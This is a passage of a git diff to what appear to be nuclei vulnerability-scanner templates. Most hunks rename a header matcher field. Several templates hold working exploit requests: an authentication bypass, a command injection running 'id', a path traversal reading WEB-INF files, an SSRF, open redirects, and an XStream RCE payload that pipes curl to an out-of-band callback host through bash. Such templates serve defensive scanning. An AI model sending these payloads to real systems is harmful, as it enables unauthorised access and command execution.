2445ebd37e..0547fa9fbe 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml @@ -43,7 +43,7 @@ http: dsl: - status_code_2 == 200 - contains(body_2, '>&action=view') - - contains(all_headers_2, "text/html") + - contains(header_2, "text/html") condition: and # Enhanced by md on 2023/03/28 diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index 873e4d5066..1c7968df7a 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -42,7 +42,7 @@ http: dsl: - status_code_2 == 200 - contains(body_2, 'extensions/\'-alert(document.domain)-\'') && contains(body_2, 'w3-total-cache') - - contains(all_headers_2, "text/html") + - contains(header_2, "text/html") condition: and # Enhanced by md on 2023/03/28 diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml new file mode 100644 index 0000000000..e0015722c8 --- /dev/null +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -0,0 +1,49 @@ +id: CVE-2021-24647 + +info: + name: Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login + author: DhiyaneshDK + severity: high + description: | + The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-24647 + - https://github.com/RandomRobbieBF/CVE-2021-24647 + - https://wpscan.com/vulnerability/40d347b1-b86e-477d-b4c6-da105935ce37 + remediation: Fixed in version 3.7.1.6 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2021-24647 + cwe-id: CWE-287 + metadata: + max-request: 3 + verified: "true" + tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp + +http: + - raw: + - | + GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/profile.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_1, "pieregister")' + - 'contains(body_3, "Username") && contains(body_3, "email-description")' + condition: and diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 633a728226..3c644a5496 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -40,7 +40,7 @@ http: matchers: - type: dsl dsl: - - contains(all_headers_2, "text/html") + - contains(header_2, "text/html") - status_code_2 == 200 - contains(body_2, 'accesskey=X onclick=alert(1) test=') - contains(body_2, 'woocommerce_persian_translate') diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index 35d5af9a60..09cd25c89f 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -38,7 +38,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200 && status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' + - 'contains(header_3, "text/html")' - 'contains(body_3, "")' - 'contains(body_3, "Affiliates Manager Click Tracking")' condition: and diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index e0feda0e7d..6bb3b80e11 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -38,7 +38,7 @@ http: - type: dsl dsl: - duration_1>=6 - - contains(all_headers_1, "application/json") + - contains(header_1, "application/json") - status_code == 200 - contains(body_2, 'other_discount_code_') condition: and diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index f73bdee5a8..f41d81362e 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -45,7 +45,7 @@ http: matchers: - type: dsl dsl: - - "contains(all_headers_3, 'text/html')" + - "contains(header_3, 'text/html')" - "status_code_3 == 200" - 'contains(body_3, "iframe src=\"javascript:alert(document.domain)") && contains(body_3, "SSH Terminal")' condition: and diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index cd13e6c041..b2382e61c8 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -53,7 +53,7 @@ http: - type: dsl dsl: - 'status_code_4 == 200' - - 'contains(all_headers_4, "text/html")' + - 'contains(header_4, "text/html")' - 'contains(body_4, "Go to ")' condition: and diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index a72742806c..ef409c9cdd 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -38,7 +38,7 @@ http: - "status_code_1 == 200" - "status_code_2 == 404" - 'contains(body_1, "prestashop")' - - "contains(tolower(all_headers_2), 'index.php?controller=404')" + - "contains(tolower(header_2), 'index.php?controller=404')" - "len(body_2) == 0" condition: and diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml index fcbcd1d504..54a9386c22 100644 --- a/http/cves/2021/CVE-2021-36873.yaml +++ b/http/cves/2021/CVE-2021-36873.yaml @@ -52,7 +52,7 @@ http: matchers: - type: dsl dsl: - - contains(all_headers_4, "text/html") + - contains(header_4, "text/html") - status_code_4 == 200 - contains(body_4, 'blockcountry_blockmessage\">test') - contains(body_4, '

Block type

') diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml index 45f7bf3aa0..82b9b82e6c 100644 --- a/http/cves/2021/CVE-2021-37216.yaml +++ b/http/cves/2021/CVE-2021-37216.yaml @@ -41,6 +41,6 @@ http: - type: dsl dsl: - - "!contains(tolower(all_headers), 'x-xss-protection')" + - "!contains(tolower(header), 'x-xss-protection')" # Enhanced by mp on 2022/08/28 diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index 6805c8edcc..f411b43c44 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -67,7 +67,7 @@ http: dsl: - 'contains(body_1, "Sign In")' - 'status_code_2 == 302' - - 'contains(all_headers_2, "session=.")' + - 'contains(header_2, "session=.")' condition: and - type: word diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml index b34e96bc6a..a6d7a8c2a8 100644 --- a/http/cves/2021/CVE-2021-39144.yaml +++ b/http/cves/2021/CVE-2021-39144.yaml @@ -2,12 +2,11 @@ id: CVE-2021-39144 info: name: XStream 1.4.18 - Remote Code Execution - author: pwnhxl + author: pwnhxl,vicrack severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted. reference: - - http://x-stream.github.io/CVE-2021-39144.html - https://x-stream.github.io/CVE-2021-39144.html - https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh - https://security.netapp.com/advisory/ntap-20210923-0003/ @@ -22,9 +21,6 @@ info: metadata: max-request: 1 -variables: - rand: "{{rand_base(6)}}" - http: - raw: - | @@ -67,7 +63,7 @@ http: - /bin/bash -c {echo,{{base64("curl http://{{interactsh-url}} -H \'User-Agent: {{rand}}\'")}}}|{base64,-d}|{bash,-i} + curl http://{{interactsh-url}} @@ -81,6 +77,5 @@ http: - type: word part: interactsh_request words: - - "User-Agent: {{rand}}" - + - "User-Agent: curl" # Enhanced by cs on 2023/04/17 diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index bb471c1f4e..e923d7c9d9 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -65,7 +65,7 @@ http: dsl: - "contains(body_4, '

')" - "contains(body_4, 'FlatPress')" - - "contains(all_headers_4, 'text/html')" + - "contains(header_4, 'text/html')" - "status_code_4 == 200" condition: and diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index cfae765178..0d4d9f9510 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -41,7 +41,7 @@ http: matchers: - type: dsl dsl: - - 'contains(all_headers_1, "text/html")' + - 'contains(header_1, "text/html")' - 'status_code_1 == 200' - 'contains(body_1, "{\"status\":\"success\"}")' - 'contains(body_2, "Welcome to Simple Client")' diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml new file mode 100644 index 0000000000..3fb489c91c --- /dev/null +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -0,0 +1,48 @@ +id: CVE-2021-44138 + +info: + name: Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal + author: carrot2 + severity: high + description: | + There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request. + reference: + - https://nvd.nist.gov/vuln/detail/cve-2021-44138 + - https://github.com/maybe-why-not/reponame/issues/2 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-44138 + cwe-id: CWE-22 + metadata: + max-request: 2 + shodan-query: html:"Resin" + verified: "true" + tags: cve,cve2021,resin,caucho,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/;/WEB-INF/web.xml" + - "{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + condition: and + + - type: word + part: header + words: + - "text/xml" + - "application/xml" + condition: or + + - type: status + status: + - 200 diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml index 3d21281da1..cbdb36a03c 100644 --- a/http/cves/2021/CVE-2021-46068.yaml +++ b/http/cves/2021/CVE-2021-46068.yaml @@ -50,7 +50,7 @@ http: matchers: - type: dsl dsl: - - "contains(all_headers_3, 'text/html')" + - "contains(header_3, 'text/html')" - "status_code_3 == 200" - 'contains(body_3, "Administrator\"> Admin")' condition: and diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index dc8071e5b9..e1b48b9d94 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -51,7 +51,7 @@ http: matchers: - type: dsl dsl: - - "contains(all_headers_3, 'text/html')" + - "contains(header_3, 'text/html')" - "status_code_3 == 200" - 'contains(body_3, "\">")' condition: and diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index ee2b1be3cd..5c064977b6 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -51,7 +51,7 @@ http: matchers: - type: dsl dsl: - - "contains(all_headers_3, 'text/html')" + - "contains(header_3, 'text/html')" - "status_code_3 == 200" - 'contains(body_3, "\">")' condition: and diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index eaf1f3a7f8..931738743a 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -50,7 +50,7 @@ http: matchers: - type: dsl dsl: - - "contains(all_headers_3, 'text/html')" + - "contains(header_3, 'text/html')" - "status_code_3 == 200" - 'contains(body_3, "\">")' condition: and diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index 232a4d26ca..010672acfe 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -51,7 +51,7 @@ http: matchers: - type: dsl dsl: - - "contains(all_headers_3, 'text/html')" + - "contains(header_3, 'text/html')" - "status_code_3 == 200" - 'contains(body_3, " Test")' condition: and diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml new file mode 100644 index 0000000000..a1ff21b98d --- /dev/null +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -0,0 +1,49 @@ +id: CVE-2021-46704 + +info: + name: GenieACS => 1.2.8 - OS Command Injection + author: DhiyaneshDK + severity: critical + description: | + In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check. + reference: + - https://twitter.com/shaybt12/status/1671598239835906058 + - https://github.com/advisories/GHSA-2877-693q-pj33 + - https://nvd.nist.gov/vuln/detail/CVE-2021-46704 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-46704 + cwe-id: CWE-78 + metadata: + max-request: 1 + verified: true + shodan-query: http.favicon.hash:-2098066288 + tags: cve,cve2021,genieacs,rce + +http: + - method: GET + path: + - "{{BaseURL}}/api/ping/;`id`" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9]+)" + + - type: word + part: header + words: + - text/plain + + - type: status + status: + - 500 + + extractors: + - type: regex + part: body + regex: + - uid=(\d+)\((\w+)\) \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index 881b7b5918..1d9b761b45 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -41,7 +41,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, "onanimationstart=alert(document.domain)")' - 'contains(body_2, "newstatpress_page")' condition: and diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index 5d2ea30faa..7dad6603ad 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -40,7 +40,7 @@ http: matchers: - type: dsl dsl: - - "contains(all_headers_2, 'text/html')" + - "contains(header_2, 'text/html')" - "status_code_2 == 200" - "contains(body_2, '') && contains(body_2, '/wp-content/plugins/')" condition: and diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml index 22dd103dcd..5835f4c176 100644 --- a/http/cves/2022/CVE-2022-0535.yaml +++ b/http/cves/2022/CVE-2022-0535.yaml @@ -54,7 +54,7 @@ http: - type: dsl dsl: - contains(body_4, 'placeholder=\"Developer IPs\" >') - - contains(all_headers_4, "text/html") + - contains(header_4, "text/html") - status_code_4 == 200 condition: and diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index c0d05770f6..bc865fb6df 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -46,7 +46,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' condition: and # Enhanced by md on 2022/09/08 diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index 7e57ac641b..39e1250b3e 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -48,7 +48,7 @@ http: - contains(body_2,'QueryException') - contains(body_2,'SQLSTATE') - contains(body_2,'runQueryCallback') - - 'contains(all_headers_2,"text/html")' + - 'contains(header_2,"text/html")' - 'status_code_2==500' condition: and diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml new file mode 100644 index 0000000000..e406507176 --- /dev/null +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-0869 + +info: + name: nitely/spirit 0.12.3 - Open Redirect + author: ctflearner + severity: medium + description: | + Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0869 + - https://huntr.dev/bounties/ed335a88-f68c-4e4d-ac85-f29a51b03342 + - https://github.com/nitely/spirit/commit/8f32f89654d6c30d56e0dd167059d32146fb32ef + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0869 + cwe-id: CWE-601 + cpe: cpe:2.3:a:spirit-project:spirit:*:*:*:*:*:*:*:* + metadata: + max-request: 4 + tags: cve,cve2022,redirect,nitely,spirit + +http: + - method: GET + path: + - "{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh" + - "{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh" + - "{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh" + - "{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh" + + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index d889e7a757..4c841cd0fc 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -53,7 +53,7 @@ http: - type: dsl dsl: - 'contains(body_3,"")' - - 'contains(all_headers_3,"text/html")' + - 'contains(header_3,"text/html")' - 'status_code_2 == 200 && status_code_3 == 200' condition: and diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml index d899a26aeb..2efec95a61 100644 --- a/http/cves/2022/CVE-2022-0952.yaml +++ b/http/cves/2022/CVE-2022-0952.yaml @@ -48,7 +48,7 @@ http: matchers: - type: dsl dsl: - - 'contains(all_headers, "application/json")' + - 'contains(header, "application/json")' - "status_code == 200" - "contains(body_1, 'users_can_register')" - "contains(body_2, 'default_role')" diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index 174675612b..064994cf50 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -55,7 +55,7 @@ http: dsl: - 'contains(body_2,"true")' - contains(body_3,'\">\" placeholder=\"Use default') - - 'contains(all_headers_3,"text/html")' + - 'contains(header_3,"text/html")' - 'status_code_3==200' condition: and diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index e5896788fb..99303e6578 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -53,7 +53,7 @@ http: dsl: - contains(body_3,'\"first_name\":\"{{payload}}\"') - 'status_code_3==200' - - 'contains(all_headers_3,"application/json")' + - 'contains(header_3,"application/json")' condition: and extractors: diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml index 83ea8e6d7d..60841f19b2 100644 --- a/http/cves/2022/CVE-2022-1007.yaml +++ b/http/cves/2022/CVE-2022-1007.yaml @@ -43,7 +43,7 @@ http: dsl: - "contains(body_2, '')" - "contains(body_2, 'advanced-booking-calendar')" - - "contains(all_headers_2, 'text/html')" + - "contains(header_2, 'text/html')" - "status_code_2 == 200" condition: and diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index dae7dafeaf..0cbdc3750a 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -18,7 +18,7 @@ info: cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:*:*:* epss-score: 0.00145 metadata: - max-request: 1 + max-request: 2 verified: true tags: unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url @@ -29,21 +29,19 @@ http: Host: {{Hostname}} Cookie: valid_login_slug=1 + - | + HEAD /wp-login.php HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and matchers: - - type: regex - part: header - regex: - - "Location: ([a-zA-Z0-9_.\\/-]+)" - - "wordpress_" + - type: dsl + dsl: + - "status_code_1 == 302" + - "contains(header_1, 'wordpress_')" + - "contains(header_1, 'Location')" condition: and - - type: word - part: header - words: - - "404.php" - negative: true - - - type: status - status: - - 302 + - type: dsl + dsl: + - "status_code_2 != 302" diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml index 965670afde..083531f771 100644 --- a/http/cves/2022/CVE-2022-1937.yaml +++ b/http/cves/2022/CVE-2022-1937.yaml @@ -39,7 +39,7 @@ http: matchers: - type: dsl dsl: - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'status_code_2 == 200' - contains(body_2, 'colspan=\"2\">') condition: and diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index 602bf32099..77fc877d61 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml @@ -63,7 +63,7 @@ http: matchers: - type: dsl dsl: - - contains(all_headers_3, "text/html") + - contains(header_3, "text/html") - status_code_3 == 200 - contains(body_1, 'success\":true') - contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9') diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index a3a54bb30d..faa35c0b77 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -44,8 +44,8 @@ http: - type: dsl dsl: - - 'contains(all_headers, "text/xml")' - - 'contains(all_headers, "application/xml")' + - 'contains(header, "text/xml")' + - 'contains(header, "application/xml")' condition: or - type: status diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index b4092643d3..b89ec073c7 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -34,7 +34,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, "script%3Ealert%28document.domain%29%3C%2Fscript%3")' - 'contains(body_2, "Unyson")' condition: and diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml index a471d4919e..9dd1dc1325 100644 --- a/http/cves/2022/CVE-2022-22536.yaml +++ b/http/cves/2022/CVE-2022-22536.yaml @@ -51,7 +51,7 @@ http: - type: dsl dsl: - "contains(tolower(body), 'administration')" # confirms 1st path - - "contains(tolower(all_headers), 'content-type: image/png')" # confirms 2nd path + - "contains(tolower(header), 'content-type: image/png')" # confirms 2nd path condition: or - type: word diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index 725c2396c4..bb5953fecd 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -42,6 +42,6 @@ http: - type: dsl dsl: - - "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')" + - "contains(tolower(header), 'location: zabbix.php?action=dashboard.view')" # Enhanced by mp on 2022/03/08 diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml new file mode 100644 index 0000000000..38392ca890 --- /dev/null +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-23544 + +info: + name: MeterSphere < 2.5.0 SSRF + author: j4vaovo + severity: medium + description: | + MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23544 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23544 + - https://github.com/metersphere/metersphere/security/advisories/GHSA-vrv6-cg45-rmjj + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-23544 + cwe-id: CWE-918 + metadata: + max-request: 1 + verified: "true" + shodan-query: html:"metersphere" + fofa-query: title="MeterSphere" + tags: cve,cve2022,metersphere,ssrf,oast + +http: + - method: GET + path: + - "{{BaseURL}}/resource/md/get/url?url=http://oast.pro" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Interactsh Server' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index e253bacf33..04608996b1 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -45,7 +45,7 @@ http: matchers: - type: dsl dsl: - - contains(all_headers_3, "text/html") + - contains(header_3, "text/html") - status_code_3 == 200 - contains(body_3, '{\"new_value\":[\"XSSPAYLOAD') condition: and diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index b7d21161a7..414210e5cf 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -18,8 +18,8 @@ info: epss-score: 0.0072 metadata: max-request: 1 - shodan-query: title:"ThinkPHP" verified: true + shodan-query: title:"ThinkPHP" tags: cve,cve2022,thinkphp,exposure,oss http: @@ -30,17 +30,16 @@ http: matchers-condition: and matchers: - type: word + part: body words: - - "ThinkPHP" - - - type: word - words: - - "HttpException" - - "TRACE" - condition: or + - "Exception" + - "REQUEST_TIME" + - "ThinkPHP Constants" + condition: and - type: status status: + - 200 + - 500 - 404 - -# Enhanced by md on 2023/02/03 + condition: or diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index c6d1c7bf78..c4eabd4f78 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -35,7 +35,7 @@ http: matchers: - type: dsl dsl: - - 'contains(to_lower(all_headers_1), "x-cmd-response:")' + - 'contains(to_lower(header_1), "x-cmd-response:")' - type: dsl dsl: diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index 5e452600de..397d63d54f 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -48,7 +48,7 @@ http: matchers: - type: dsl dsl: - - 'contains(all_headers_3, "text/html")' + - 'contains(header_3, "text/html")' - 'status_code_3 == 200' - contains(body_3, 'admin-name\">nuclei') condition: and diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index 014eae5913..964b055c12 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -38,7 +38,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, "ee-simple-file-list")' - 'contains(body_2, "onanimationstart=alert(document.domain)//")' condition: and diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index ab87121e82..b95e8a2d96 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -34,7 +34,7 @@ http: - type: dsl dsl: - duration>=7 - - contains(all_headers, "text/html") + - contains(header, "text/html") - status_code == 200 - contains(body, '{\"CardNo\":false') condition: and diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index 806aee3602..f48082d3c7 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -34,7 +34,7 @@ http: matchers: - type: dsl dsl: - - 'contains(all_headers, "text/html")' + - 'contains(header, "text/html")' - 'status_code == 200' - contains(body,'<\"?cmd=') condition: and diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index 04dd2655a6..de11854cf1 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -52,7 +52,7 @@ http: matchers: - type: dsl dsl: - - "contains(all_headers_4, 'text/html')" + - "contains(header_4, 'text/html')" - "status_code_4 == 200" - 'contains(body_4, "value=\"\" autofocus onfocus=alert(document.domain)>")' - "contains(body_4, 'The amount of automatically')" diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index 